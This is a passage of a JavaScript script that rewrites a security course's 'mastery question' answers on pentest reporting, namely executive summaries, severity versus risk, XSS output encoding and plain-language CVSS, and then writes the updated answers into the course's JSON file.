    "Executive summary paragraph for a pentest that found SQL injection on login page (Critical), missing security headers (Low), outdated Apache version (Medium). Example: 'During the assessment of your customer portal between 1-5 June, three categories of security issues were identified. The most significant is a critical SQL injection vulnerability in the user login form, which allows an unauthenticated attacker to bypass authentication and access any account, including administrative accounts. Successful exploitation would expose the full customer database and grant the attacker the same access as your trusted users. This issue requires immediate remediation. We also found that the web server is running an outdated version of Apache (2.4.41, released in 2019) with two publicly known security advisories — a software update is recommended within the next maintenance window. Finally, the portal does not set several HTTP security headers (Content-Security-Policy, Strict-Transport-Security, X-Frame-Options); while these do not introduce direct vulnerabilities, they weaken the browser's defences against future client-side attacks and should be added as part of routine hardening. Full reproduction steps and remediation guidance for each issue follow in the technical findings.' Note what is and is not here: business impact in plain English (no CVSS numbers, no acronyms), priority ordering by risk to the company, no jargon. The CFO reads this paragraph and understands what to authorise.",

    "Severity is a property of the vulnerability itself — the attacker capability and the impact if exploited, typically expressed via CVSS. Risk is the probability that the vulnerability will be exploited combined with the impact to YOUR business if it is. A Low severity bug with High risk: an information-disclosure issue (CVSS 3.5 — Low) reveals the existence of internal staging endpoints (`staging-api.company.com`). Severity is genuinely low — no immediate compromise. But: those staging endpoints have weak authentication, are connected to production data, and are being actively probed by a known threat actor that has been targeting your industry for months. Combined with credentials harvested from a separate phishing campaign two weeks ago, the disclosure provides the exact attack surface the threat actor needs to pivot into your production environment. The Low severity bug now sits at the centre of a High risk threat scenario. Risk = severity × exposure × threat intent × business impact. Severity is one of four factors. This is why mature security teams do not patch strictly by CVSS — they consider the active threat landscape, the asset's business value, and the attacker capability they actually face.",

    "A developer reads your XSS remediation and says 'just sanitise the input'. This is wrong — at least incomplete and at worst dangerous — for two reasons. (1) 'Sanitisation' (stripping or escaping characters at input time) is fragile because the right escaping depends on the OUTPUT context, not the input. The same string `<script>` needs different handling if it ends up in HTML body (escape as `&lt;script&gt;`), HTML attribute (escape quotes, ampersand, less-than), JavaScript string literal (escape backslash, quote, less-than, slash), CSS context (escape carefully or reject entirely), or URL parameter (URL-encode). Input sanitisation that escapes for HTML breaks the data when it later appears in JSON. Output encoding handles each context correctly. (2) Input sanitisation assumes you control every code path that uses the data. As soon as a new feature uses the same database field in a new context (the user's bio displayed in an HTML page, then in a JSON API, then in an email), the old sanitisation is insufficient. The correct remediation: encode at output time using context-aware encoders (your framework provides them: React escapes by default, Django templates auto-escape, Rails `<%= %>` auto-escapes). Treat all stored data as potentially-hostile and encode whenever it enters a sensitive context. This pattern (output encoding) is what scales.",

    "Explaining CVSS scoring to a non-technical executive without using the acronym: 'When we find a security issue, we score it on a scale from 0 to 10 based on three things: how easily an attacker could exploit it, how much access they would gain if they did, and how much damage they could cause. A score of 9 or 10 means a remote attacker could take complete control with minimal effort — these need to be fixed within 24-48 hours. A score of 7 or 8 means the attacker needs some preconditions (user has to click a link, attacker needs a low-privilege account first) but the impact is still severe — fix within a week. A score of 4-6 means either the impact is contained (data leak rather than takeover) or the exploit is non-trivial (needs physical access, complex attack chain) — fix within a month. Below 4 is good to fix but not urgent. The score is a global standard — every security professional understands it — but the right priority for YOUR business depends on more than the number. A 9 on a system that handles customer payments is more urgent than a 9 on an internal HR tool used by three people.' What did this avoid? The acronym CVSS, the term 'vector string', the words 'integrity' and 'confidentiality' as security terms. Plain English plus business context.",

    "Executive summary content vs technical findings content. The executive summary contains: business impact (what could happen to the company), risk ratings in plain English (Critical / High / Medium / Low), a short prioritised list of categories of issues found, recommended business actions (engage incident response, allocate engineering capacity, brief leadership), the timebox and scope of the assessment. It does NOT contain: CVE numbers, CVSS vectors, payload strings, HTTP requests, code snippets, tool names like sqlmap or Burp, line numbers in source files, parameter names. The technical findings contain: per-finding ID, title, severity rating with CVSS vector, affected component and version, full reproduction steps with HTTP requests and responses, evidence (screenshots, log excerpts), impact analysis specific to this finding, remediation with code-level guidance (which library, which configuration, which patch). It does NOT contain: business narrative, executive opinion, generic 'security is important' framing, full CVSS theory explanations (link to the CVSS calculator instead). The bright line: an executive reads the summary in 5 minutes and knows what to authorise. A developer reads ONE finding in 15 minutes and knows exactly what to change. Mixing the two creates a report that is too long for the executive and too vague for the developer — both audiences ignore it.",
  ],
};

function run() {
  const raw = fs.readFileSync(FILE, "utf8");
  const data = JSON.parse(raw);
  let changedWeeks = 0;
  let changedQuestions = 0;

  for (const week of data.weeks ?? []) {
    const rewrite = REWRITES[week.number];
    if (!rewrite) continue;
    if (!Array.isArray(week.mastery_questions)) {
      console.warn(`Week ${week.number}: no mastery_questions array, skipping`);
      continue;
    }
    if (rewrite.length !== week.mastery_questions.length) {
      console.warn(
        `Week ${week.number}: rewrite has ${rewrite.length} but original has ${week.mastery_questions.length} — replacing in full`,
      );
    }
    week.mastery_questions = [...rewrite];
    changedWeeks++;
    changedQuestions += rewrite.length;
  }

  fs.writeFileSync(FILE, JSON.stringify(data, null, 2) + "\n");
  console.log(`Updated ${changedWeeks} weeks · ${changedQuestions} mastery questions rewritten.`);
}

run();
